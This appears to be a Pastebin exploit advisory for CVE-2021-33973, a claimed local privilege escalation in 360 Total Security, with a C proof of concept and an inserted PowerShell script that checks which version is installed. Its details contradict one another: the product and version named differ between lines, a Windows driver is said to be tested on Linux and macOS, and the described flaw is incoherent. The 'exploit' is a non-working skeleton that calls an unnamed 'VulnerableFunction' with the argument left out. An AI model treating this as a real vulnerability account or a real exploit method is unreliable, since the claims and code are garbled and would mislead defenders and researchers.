CVE-2021-33973 - Pastebin.com
Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate privileges.
# Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation
# Google Dork: N/A
# Date: 2021-05-11
# Exploit Author: youtube.com/@memorycorruptor
# Vendor Homepage: http://www.360totalsecurity.com/
# Version: 360 Total Security 10.8.0.1213
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2021-33973
# PoC Video: https://www.youtube.com/@memorycorruptor/videos
# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
---------------------------------------------------------------------------
Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213
- A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213 allows the antivirus software to execute actions with system-level privileges while running under standard user privileges. The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
Introduction
360 Total Security 10.8.0.1213 is antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
Vulnerability
The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
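As an added inventory check (not part of the original post), the PowerShell below reports whether the 360 Total Security build named in this advisory is installed on a host, by reading the standard Uninstall registry keys and comparing the recorded DisplayVersion against the listed version. The DisplayName match string "*360 Total Security*" and the assumption that the product registers a DisplayVersion there are assumptions of this example, not facts from the advisory.

```powershell
# Added example: check installed 360 Total Security version against the
# version listed in this advisory. Not code from the Pastebin post.
# Assumption: the product registers an Uninstall entry whose DisplayName
# contains "360 Total Security" and whose DisplayVersion holds the build.
$AffectedVersions = @('10.8.0.1213')   # version from the advisory header

$UninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

function Get-360TotalSecurityInstall {
    # Enumerate both 64-bit and WOW6432Node uninstall entries
    Get-ItemProperty -Path $UninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like '*360 Total Security*' } |
        Select-Object DisplayName, DisplayVersion, InstallLocation
}

function Test-AffectedVersion {
    param([string]$Version)
    # Compare as [version] objects so "10.8.0.1213" is not compared as text
    try { $parsed = [version]$Version } catch { return $false }
    foreach ($v in $AffectedVersions) {
        if ($parsed -eq [version]$v) { return $true }
    }
    return $false
}

$installs = @(Get-360TotalSecurityInstall)
if ($installs.Count -eq 0) {
    Write-Output 'No 360 Total Security install found in the Uninstall registry keys.'
} else {
    foreach ($i in $installs) {
        $status = if (Test-AffectedVersion $i.DisplayVersion) {
            'MATCHES the version listed in the advisory'
        } else {
            'not a version listed in the advisory'
        }
        Write-Output ('{0} {1}: {2}' -f $i.DisplayName, $i.DisplayVersion, $status)
    }
}
```

Run it from an elevated PowerShell session on each host in scope; an unparseable or missing DisplayVersion is reported as "not a listed version", so review those entries manually rather than treating them as clean.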
- Proof of Concept
#include <Windows.h>
#include <stdio.h>

int main(void) {
    // Load the vulnerable driver.
    // Note: LoadLibrary maps the file into this user-mode process as an image;
    // it does not load or start it as a kernel driver.
    HMODULE hDriver = LoadLibraryA("360TotalSecurity.sys");
    if (!hDriver) {
        printf("Failed to load driver: %lu\n", GetLastError());
        return 1;
    }

    // Get the address of the vulnerable function
    FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    if (!pVulnFunc) {
        printf("Failed to get function address: %lu\n", GetLastError());
        FreeLibrary(hDriver);
        return 1;
    }

    // Exploit code (the crafted argument is left unspecified in this advisory)
    pVulnFunc(/* Crafted argument */);

    FreeLibrary(hDriver);
    return 0;
}
The PoC loads the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
---------------------------------------------------------------------------